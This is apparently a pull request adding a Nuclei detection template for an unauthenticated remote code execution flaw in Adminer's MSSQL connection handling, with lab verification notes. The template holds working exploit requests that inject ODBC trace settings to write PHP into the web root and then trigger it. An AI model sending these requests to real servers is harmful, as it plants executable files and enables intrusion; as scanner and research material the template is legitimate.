### PR TITLE
Add CVE-2026-56705 - Adminer < 5.4.3 Unauthenticated RCE via MSSQL PDO DSN Injection

### DIFF
--- a/http/cves/2026/CVE-2026-56705.yaml
+++ b/http/cves/2026/CVE-2026-56705.yaml
@@ -1,0 +1,79 @@
+id: CVE-2026-56705
+
+info:
+  name: Adminer < 5.4.3 - Unauthenticated RCE via MSSQL PDO DSN Injection
+  author: Boreas37
+  severity: critical
+  description: |
+    Adminer before 5.4.3 fails to sanitize the user-supplied server field before
+    constructing the PDO DSN string for MSSQL connections. An unauthenticated
+    attacker can inject ODBC connection attributes (TraceFile, TraceOn) via
+    semicolons, causing the ODBC driver manager to write a trace file containing
+    attacker-controlled PHP code (from the username field) into the web root,
+    resulting in remote code execution when the written file is requested.
+    The trace file is written even though the database connection itself fails.
+  impact: |
+    Unauthenticated remote code execution on servers running Adminer < 5.4.3
+    with the pdo_sqlsrv PHP extension and Microsoft ODBC Driver for SQL Server
+    installed (a common setup for Azure SQL / SQL Server backends).
+  remediation: |
+    Upgrade to Adminer 5.4.3 or later.
+  reference:
+    - https://github.com/vrana/adminer/security/advisories/GHSA-r4x9-5m63-3vxw
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-56705
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-56705
+    cwe-id: CWE-20
+  metadata:
+    max-request: 9
+    verified: true
+    shodan-query: http.html:"Adminer"
+  tags: cve,cve2026,adminer,rce,file-write,unauth,php
+
+http:
+  # NOTE: Adminer performs the actual PDO connection on the redirect target
+  # (/adminer.php?mssql=...&username=...), NOT on the login POST itself, and
+  # that continuation request requires the adminer_sid session cookie (403
+  # otherwise). The sid is captured from the login response and replayed via
+  # an explicit Cookie header. The marker is a CONCATENATED PHP expression:
+  # reflected input on patched instances or 404 path echoes can never produce
+  # it - only executed PHP can.
+  - payloads:
+      srv:
+        - "127.0.0.1%3BTraceFile%3D%2Fvar%2Fwww%2Fpwn56705.php%3BTraceOn%3D1"
+        - "127.0.0.1%3BTraceFile%3D%2Fvar%2Fwww%2Fhtml%2Fpwn56705.php%3BTraceOn%3D1"
+        - "127.0.0.1%3BTraceFile%3D%2Fusr%2Fshare%2Fnginx%2Fhtml%2Fpwn56705.php%3BTraceOn%3D1"
+
+    raw:
+      - |
+        POST /adminer.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        auth%5Bdriver%5D=mssql&auth%5Bserver%5D={{srv}}&auth%5Busername%5D=%3C%3Fphp+echo+%22RCE%22.%2256705%22.%22OK%22%3B%3F%3E&auth%5Bpassword%5D=x
+      - |
+        GET /adminer.php?mssql={{srv}}&username=%3C%3Fphp+echo+%22RCE%22.%2256705%22.%22OK%22%3B%3F%3E HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: adminer_sid={{sid}}
+
+      - |
+        GET /pwn56705.php HTTP/1.1
+        Host: {{Hostname}}
+
+    extractors:
+      - type: regex
+        name: sid
+        part: header
+        internal: true
+        group: 1
+        regex:
+          - "adminer_sid=([a-f0-9]{32})"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "RCE56705OK"


### PR DESCRIPTION
## Template

Adds `http/cves/2026/CVE-2026-56705.yaml` — detection for **CVE-2026-56705** (GHSA-r4x9-5m63-3vxw), an unauthenticated RCE in Adminer < 5.4.3.

## Vulnerability summary

Adminer fails to sanitize the user-supplied `server` field before building the MSSQL PDO DSN (`adminer/drivers/mssql.inc.php`, `attach()`). Semicolons let an unauthenticated attacker append ODBC attributes; `TraceFile` + `TraceOn` make the driver write a trace containing the attacker-controlled username (PHP code) into the web root. The file is written even though the connection fails, and requesting it executes the code. CVSS 9.8, fixed in 5.4.3. Vendor advisory: https://github.com/vrana/adminer/security/advisories/GHSA-r4x9-5m63-3vxw — public PoC: https://github.com/Boreas37/CVE-2026-56705

## Detection logic (3 requests)

1. `POST /adminer.php` with `auth[driver]=mssql` + injected DSN → 302, seeds session
2. `GET /adminer.php?mssql=<injected>&username=<payload>` — **the redirect target is where Adminer actually performs the PDO connection and where TraceFile gets written**; it requires the `adminer_sid` cookie set by request 1 (captured via internal regex extractor)
3. `GET /pwn56705.php` — fetches the written file

The marker is a **concatenated PHP expression** (`"RCE"."56705"."OK"` → matches only when PHP actually executes): patched instances reflect the raw username on error pages and PHP built-in server echoes the request path on 404s, so a literal marker would false-positive. This was caught during two-way testing.

Payloads cover three common web roots: `/var/www/`, `/var/www/html/`, `/usr/share/nginx/html/`.

## Verification (both directions, real lab)

Lab: Docker `php:8.3-cli` + `pdo_sqlsrv` (pecl) + `msodbcsql18`, arm64, Adminer 5.4.2 (vulnerable) vs 5.4.3 (patched).

| Target | Result |
|---|---|
| Adminer 5.4.2 (vulnerable) | ✅ `[CVE-2026-56705] [http] [critical] http://.../pwn56705.php` — all 3 payloads hit; written shell confirmed RCE (`id` → `uid=0(root)` via PoC script) |
| Adminer 5.4.3 (patched) | ✅ no results — no trace file is written, no match |

```
$ nuclei -t CVE-2026-56705.yaml -u http://localhost:8181 -silent
[CVE-2026-56705] [http] [critical] http://localhost:8181/pwn56705.php [srv="127.0.0.1%3BTraceFile%3D%2Fvar%2Fwww%2Fpwn56705.php%3BTraceOn%3D1"]
[CVE-2026-56705] [http] [critical] http://localhost:8181/pwn56705.php [srv="127.0.0.1%3BTraceFile%3D%2Fvar%2Fwww%2Fhtml%2Fpwn56705.php%3BTraceOn%3D1"]
[CVE-2026-56705] [http] [critical] http://localhost:8181/pwn56705.php [srv="127.0.0.1%3BTraceFile%3D%2Fusr%2Fshare%2Fnginx%2Fhtml%2Fpwn56705.php%3BTraceOn%3D1"]

$ nuclei -t CVE-2026-56705.yaml -u http://localhost:8282 -silent   # 5.4.3
(no results)
```

## Notes

- Non-destructive: writes a single small trace file into the web root of vulnerable instances only; no DB access, no state change.
- `nuclei -validate` passes.